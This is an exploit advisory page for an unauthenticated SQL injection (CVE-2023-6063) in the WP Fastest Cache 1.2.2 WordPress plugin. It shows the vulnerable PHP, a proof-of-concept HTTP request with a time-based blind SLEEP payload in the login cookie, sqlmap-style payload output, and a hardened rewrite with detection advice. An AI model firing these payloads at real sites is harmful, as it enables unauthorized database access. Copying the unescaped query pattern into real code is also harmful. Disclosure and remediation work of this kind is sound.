WP Fastest Cache 1.2.2 Unauthenticated SQL Injection

2024.02.29
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

# Exploit Title: Unauthenticated SQL Injection in WP Fastest Cache 1.2.2
# Date: 14.11.2023
# Exploit Author: Meryem Taşkın
# Vendor Homepage: https://www.wpfastestcache.com/
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
# Version: WP Fastest Cache 1.2.2
# Tested on: WP Fastest Cache 1.2.2
# CVE: CVE-2023-6063

## Description

An SQL injection vulnerability exists in version 1.2.2 of the WP Fastest Cache plugin, allowing an attacker to trigger SQL queries on the system without authentication.

## Vuln Code

```php
public function is_user_admin(){
	global $wpdb;
	foreach ((array)$_COOKIE as $cookie_key => $cookie_value){
		if(preg_match("/wordpress_logged_in/i", $cookie_key)){
			$username = preg_replace("/^([^\|]+)\|.+/", "$1", $cookie_value);
			break;
		}
	}
	if(isset($username) && $username){
		$res = $wpdb->get_var("SELECT `$wpdb->users`.`ID`, `$wpdb->users`.`user_login`, `$wpdb->usermeta`.`meta_key`, `$wpdb->usermeta`.`meta_value` FROM `$wpdb->users` INNER JOIN `$wpdb->usermeta` ON `$wpdb->users`.`user_login` = \"$username\" AND
		# $username variable is not escaped, vulnerable to SQL injection
		.....
```

## Exploit

```http
GET / HTTP/1.1
Cookie: wordpress_logged_in_1=%22%20AND%20%28SELECT%201%20FROM%20%28SELECT%28SLEEP%285%29%29A%29%20AND%20%221%22%3D%221
Host: meryem.local
```

## Parameter

```
Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: wordpress_logged_in_dsadasdasd=" AND (SELECT 3809 FROM (SELECT(SLEEP(5)))RDVP) AND "HQDg"="HQDg
---
```

## References

- [WPScan Blog Post](https://wpscan.com/blog/unauthenticated-sql-injection-vulnerability-addressed-in-wp-fastest-cache-1-2-2/)
- [WPScan Vulnerability](https://wpscan.com/vulnerability/30a74105-8ade-4198-abe2-1c6f2967443e/)
- [CVE-2023-6063](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6063)

## Credits

- Original Researcher: Alex Sanford
- PoC: Meryem Taşkın
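The root cause above is that a value taken straight from a request cookie (`$username`) is interpolated into a `$wpdb->get_var()` query string. The following is an added hardening example, not the plugin's own fix and not code from the advisory: it rewrites the same check so the cookie is first validated by WordPress core (`wp_validate_auth_cookie()`, which verifies the cookie HMAC) and the capability lookup is then issued through `$wpdb->prepare()` with `%s` placeholders, so no request-controlled string ever reaches the SQL grammar. The function name `wpfc_example_is_user_admin` is an assumption; the WordPress globals and helpers used (`$wpdb`, `wp_validate_auth_cookie()`, `$wpdb->esc_like()`, `$wpdb->prefix`) are standard core APIs.

```php
<?php
// Added hardening example (not the plugin's code): same purpose as the
// vulnerable is_user_admin() above, but the cookie-derived username is
// never concatenated into SQL.
//
// Assumes a WordPress runtime: global $wpdb, wp_validate_auth_cookie(),
// $wpdb->prepare(), $wpdb->esc_like(), $wpdb->prefix.

function wpfc_example_is_user_admin() {
	global $wpdb;

	foreach ( (array) $_COOKIE as $cookie_key => $cookie_value ) {
		// Only consider the "logged in" auth cookie family (case-insensitive prefix match).
		if ( 0 !== stripos( $cookie_key, 'wordpress_logged_in' ) ) {
			continue;
		}

		// Step 1: let core verify the cookie signature and expiry. An attacker-crafted
		// cookie (as in the PoC) fails here and is never parsed any further.
		$user_id = wp_validate_auth_cookie( $cookie_value, 'logged_in' );
		if ( ! $user_id ) {
			return false;
		}

		// Step 2: look up the administrator capability with a prepared statement.
		// %d / %s placeholders are bound by $wpdb->prepare(), which quotes and escapes
		// the values; the table names come from $wpdb, not from the request.
		$sql = $wpdb->prepare(
			"SELECT u.ID
			   FROM {$wpdb->users} u
			   INNER JOIN {$wpdb->usermeta} m ON m.user_id = u.ID
			  WHERE u.ID = %d
			    AND m.meta_key = %s
			    AND m.meta_value LIKE %s
			  LIMIT 1",
			(int) $user_id,
			$wpdb->prefix . 'capabilities',          // e.g. wp_capabilities
			'%' . $wpdb->esc_like( 'administrator' ) . '%'
		);

		return (bool) $wpdb->get_var( $sql );
	}

	// No logged-in cookie present: treat the visitor as an anonymous user.
	return false;
}
```

The two changes are independent and both matter. Validating the cookie first removes the unauthenticated trigger, because the PoC cookie carries no valid HMAC and is rejected before any query runs; using `$wpdb->prepare()` removes the injection sink itself, so even a future code path that trusts a cookie name again cannot turn the username into SQL. For detection, the PoC's signature is a `wordpress_logged_in*` cookie whose value contains SQL keywords (`SLEEP(`, `SELECT`, quote-and-`AND` sequences) rather than the `user|expiry|token|hmac` shape of a real auth cookie.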


Copyright 2024, cxsecurity.com
